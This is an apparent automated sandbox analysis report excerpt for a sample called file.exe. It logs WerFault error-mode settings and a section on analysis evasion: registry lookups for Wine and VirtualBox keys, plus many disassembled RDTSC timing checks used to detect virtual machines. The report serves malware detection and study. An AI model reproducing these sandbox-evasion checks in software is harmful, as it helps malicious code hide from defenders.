    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3D28 second address: 3A3D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3D33 second address: 3A3D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3D37 second address: 3A3D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3D3B second address: 3A3D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F764878255Dh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E5EB second address: 51E5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E718 second address: 51E71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E71C second address: 51E734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E734 second address: 51E73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51EAD7 second address: 51EB12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F7648CE84F6h 0x00000008 jo 00007F7648CE84E6h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F7648CE84F7h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51EB12 second address: 51EB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522A4A second address: 522B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648CE84ECh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D3377h], eax 0x00000013 push 00000000h 0x00000015 and ecx, dword ptr [ebp+122D2DB8h] 0x0000001b push D23E2C34h 0x00000020 jnc 00007F7648CE84F4h 0x00000026 add dword ptr [esp], 2DC1D44Ch 0x0000002d push eax 0x0000002e sub dword ptr [ebp+122D1CB1h], edx 0x00000034 pop esi 0x00000035 push 00000003h 0x00000037 adc cx, 95D1h 0x0000003c push edi 0x0000003d add edi, 60AF9027h 0x00000043 pop ecx 0x00000044 push 00000000h 0x00000046 mov edi, dword ptr [ebp+122D2BFCh] 0x0000004c sub dword ptr [ebp+122D25BCh], edi 0x00000052 push 00000003h 0x00000054 sub dword ptr [ebp+122D3B3Dh], edi 0x0000005a push 5341CBE3h 0x0000005f jmp 00007F7648CE84F4h 0x00000064 add dword ptr [esp], 6CBE341Dh 0x0000006b cld 0x0000006c lea ebx, dword ptr [ebp+12452956h] 0x00000072 mov ecx, dword ptr [ebp+122D2B5Ch] 0x00000078 xchg eax, ebx 0x00000079 js 00007F7648CE84F5h 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522B02 second address: 522B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7648782556h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522B4C second address: 522B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1D7Eh], edx 0x0000000d push 00000000h 0x0000000f jmp 00007F7648CE84F1h 0x00000014 push D0E43237h 0x00000019 js 00007F7648CE84F8h 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F7648CE84E6h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522B7F second address: 522BEF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7648782556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 2F1BCE49h 0x00000011 stc 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F7648782558h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e jg 00007F764878255Ch 0x00000034 push 00000000h 0x00000036 jmp 00007F7648782568h 0x0000003b push 00000003h 0x0000003d and esi, dword ptr [ebp+122D311Eh] 0x00000043 call 00007F7648782559h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pop edx 0x0000004c pop eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522BEF second address: 522BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522BF3 second address: 522BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522BF7 second address: 522C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F7648CE84EAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7648CE84F2h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522C1E second address: 522CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e ja 00007F764878256Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 jnl 00007F764878256Dh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push edi 0x00000022 push edi 0x00000023 pop edi 0x00000024 pop edi 0x00000025 je 00007F764878255Ch 0x0000002b jnc 00007F7648782556h 0x00000031 popad 0x00000032 pop eax 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F7648782558h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d jmp 00007F7648782563h 0x00000052 lea ebx, dword ptr [ebp+1245295Fh] 0x00000058 mov edx, dword ptr [ebp+122D3C6Eh] 0x0000005e push eax 0x0000005f push ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522CC7 second address: 522CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522CCB second address: 522CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522DD9 second address: 522DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7648CE84F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522DF6 second address: 522E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jno 00007F7648782561h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push esi 0x00000014 push ecx 0x00000015 jg 00007F7648782556h 0x0000001b pop ecx 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jl 00007F7648782567h 0x00000029 jmp 00007F7648782561h 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5425B6 second address: 5425BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5425BA second address: 5425E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F7648782573h 0x0000000e jmp 00007F764878255Ah 0x00000013 jmp 00007F7648782563h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5425E5 second address: 54261A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7648CE84F0h 0x0000000e jmp 00007F7648CE84EAh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54261A second address: 54261E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5403BF second address: 5403C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5403C9 second address: 5403CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5403CF second address: 5403D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5403D5 second address: 5403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F764878255Eh 0x0000000d jnc 00007F7648782556h 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F7648782558h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5403F9 second address: 540415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7648CE84F6h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540415 second address: 54041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54057B second address: 5405A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F7648CE84F2h 0x00000011 jmp 00007F7648CE84ECh 0x00000016 je 00007F7648CE84ECh 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540708 second address: 540736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 jng 00007F7648782556h 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 jmp 00007F7648782568h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540736 second address: 54073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54073A second address: 540743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540743 second address: 540749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54087B second address: 540890 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7648782556h 0x00000008 jp 00007F7648782556h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540890 second address: 540895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540895 second address: 5408A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7648782556h 0x0000000a jne 00007F7648782556h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540FB3 second address: 540FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537982 second address: 5379B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7648782567h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jc 00007F7648782556h 0x00000012 jmp 00007F7648782562h 0x00000017 pop esi 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379B9 second address: 5379BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379BF second address: 5379C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379C3 second address: 5379C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541CE1 second address: 541CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541CE6 second address: 541D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7648CE84E6h 0x0000000a jmp 00007F7648CE84EDh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop ecx 0x00000017 push ecx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F7648CE84EFh 0x0000001f pop ecx 0x00000020 jmp 00007F7648CE84F6h 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007F7648CE84E6h 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54213E second address: 54215B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F7648782556h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F764878255Eh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54215B second address: 54215F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54215F second address: 54217D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F7648782556h 0x0000000e jmp 00007F7648782560h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545B15 second address: 545B2D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnc 00007F7648CE84E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545B2D second address: 545B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545B32 second address: 545B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545B38 second address: 545B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54955F second address: 54957D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F7648CE84F4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B70A second address: 54B70E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B70E second address: 54B72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7648CE84F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E43D second address: 54E447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7648782556h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E5D1 second address: 54E5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E74E second address: 54E763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F764878255Fh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E9C3 second address: 54E9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7648CE84EDh 0x0000000b popad 0x0000000c jmp 00007F7648CE84F4h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E9EB second address: 54EA1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648782567h 0x00000007 jmp 00007F764878255Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jng 00007F7648782558h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54EB71 second address: 54EBBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007F7648CE84F8h 0x00000012 jmp 00007F7648CE84F8h 0x00000017 pop esi 0x00000018 jmp 00007F7648CE84EDh 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54EBBC second address: 54EBC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007F7648782556h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ED22 second address: 54ED28 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ED28 second address: 54ED35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ED35 second address: 54ED3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ED3D second address: 54ED41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552106 second address: 552122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7648CE84F8h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552122 second address: 552126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552126 second address: 55214E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jg 00007F7648CE84E8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7648CE84F4h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5521F3 second address: 5521F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5521F7 second address: 5521FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5521FB second address: 55222C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 752B8E62h 0x0000000e jmp 00007F7648782569h 0x00000013 push B2E25760h 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552764 second address: 552774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552774 second address: 552784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F764878255Bh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552784 second address: 552789 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55284F second address: 552855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552855 second address: 55285A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55303A second address: 55303E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55303E second address: 553064 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7648CE84F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553064 second address: 553079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F764878255Ch 0x0000000f ja 00007F7648782556h 0x00000015 rdtsc
